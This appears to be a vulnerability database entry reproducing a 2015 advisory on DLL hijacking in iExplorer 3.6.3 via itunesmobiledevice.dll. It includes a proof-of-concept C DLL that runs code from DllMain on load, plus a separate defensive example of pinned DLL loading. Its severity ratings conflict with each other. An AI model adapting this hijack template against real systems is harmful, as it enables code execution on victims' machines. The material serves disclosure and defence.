iExplorer 3.6.3 - DLL Hijacking Exploit itunesmobiledevice.dll

Vulnerability ID 1041149 Vulnerability type
Published 2015-10-05 Updated 2015-10-05
CVE ID N/A CNNVD-ID N/A
Platform N/A CVSS score N/A
|Vulnerability source
https://cxsecurity.com/issue/WLB-2015100030
|Vulnerability details
Vulnerability details have not yet been disclosed
|Vulnerability EXP
Document Title:
===============
iExplorer 3.6.3 - DLL Hijacking Exploit itunesmobiledevice.dll

=============
2015-07-30


Product & Service Introduction:
===============================
iExplorer lets you easily transfer music from any iPhone, iPod or iPad to a Mac or PC computer and iTunes. You can search for
and preview particular songs then copy them to iTunes with the touch of a button or with drag and drop. Looking to transfer
more than just a few tracks? With one click, iExplorer lets you instantly rebuild entire playlists or use the Auto Transfer
feature and copy everything from your device to iTunes.


Discovery Status:
=================
Published


Affected Product(s):
====================
Macroplant
Product: iExplorer 3.6.3.0


Exploitation Technique:
=======================
Local


Severity Level:
===============
High


Technical Details & Description:
================================
Macroplant iExplorer could allow a remote attacker to execute arbitrary code on the system. The application does not specify the fully
qualified path to a dynamic-link library (itunesmobiledevice.dll) when running on Microsoft Windows. By persuading a victim to open a
specially crafted file from a WebDAV or SMB share using a vulnerable application, a remote attacker could exploit this vulnerability via a
specially crafted library to execute arbitrary code on the system.
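
The corrective pattern for the missing fully qualified path described above, as an added example that is not code from the advisory or from the vendor: the DLL is loaded only from a pinned absolute path on a fixed local disk, so a copy sitting beside a document on a share is never searched for. The function names and the install path are assumptions made for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#ifdef _WIN32
#include <windows.h>
#endif

static int is_sep(char c) { return c == '\\' || c == '/'; }

/* 1 only for a drive-letter absolute path (C:\dir\lib.dll) with no ".."
 * component. Bare names, relative paths and UNC/WebDAV (\\host\share\...)
 * paths return 0, so the loader never gets to search for the file. */
int is_fully_qualified_local(const char *p)
{
    if (p == NULL || !isalpha((unsigned char)p[0]) || p[1] != ':' || !is_sep(p[2]))
        return 0;
    for (const char *s = p + 2; *s != '\0'; s++)
        if (is_sep(s[0]) && s[1] == '.' && s[2] == '.' && (is_sep(s[3]) || s[3] == '\0'))
            return 0;
    return 1;
}

#ifdef _WIN32
/* Hypothetical helper: load one DLL from a pinned location on a fixed disk. */
HMODULE load_pinned(const char *full_path)
{
    char root[4] = "C:\\";
    if (!is_fully_qualified_local(full_path))
        return NULL;
    root[0] = full_path[0];
    if (GetDriveTypeA(root) != DRIVE_FIXED)   /* rejects mapped network drives */
        return NULL;
    /* Dependencies resolve from the DLL's own directory and System32 only. */
    return LoadLibraryExA(full_path, NULL,
        LOAD_LIBRARY_SEARCH_DLL_LOAD_DIR | LOAD_LIBRARY_SEARCH_SYSTEM32);
}
#endif

int main(void)
{
    /* Constructed install path, not taken from the advisory. */
    const char *dll = "C:\\Program Files\\ExampleVendor\\itunesmobiledevice.dll";
#ifdef _WIN32
    SetDllDirectoryA("");   /* drop the current directory from the search order */
    printf("load %s\n", load_pinned(dll) ? "succeeded" : "refused or failed");
#else
    printf("accepted=%d\n", is_fully_qualified_local(dll));
#endif
    return 0;
}
```

The path check is portable C; the load itself compiles only on Windows.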


Proof of Concept (PoC):
=======================
/*
* Exploit Title: iExplorer 3.6.3.0 DLL Hijacking Exploit (itunesmobiledevice.dll)
* Author: Tonel Team[Zeus_Syborg]
* Vendor Homepage: http://www.macroplant.com/
* Software link: http://www.macroplant.com/downloads
* Tested on: Windows 8.1, Google chrome
*/

#include <windows.h>

/* Forward declaration: owned() is defined after DllMain. */
int owned(void);

BOOL WINAPI DllMain (
            HINSTANCE hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
{
    switch (fdwReason)
    {
    case DLL_PROCESS_ATTACH:
        /* Runs as soon as the host process maps the DLL. */
        owned();
        /* fall through */
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

/* Marker payload: a message box that proves the DLL was loaded. */
int owned(void) {
    MessageBoxA(0, "iExplorer DLL HijackedZeus_Syborg", "POC", MB_OK);
    return 0;
}


Security Risk:
==============
The security risk of the local software vulnerability is estimated as medium. (CVSS 8.0)


Credits & Authors:
==================
Zeus_Syborg [Tonel Team]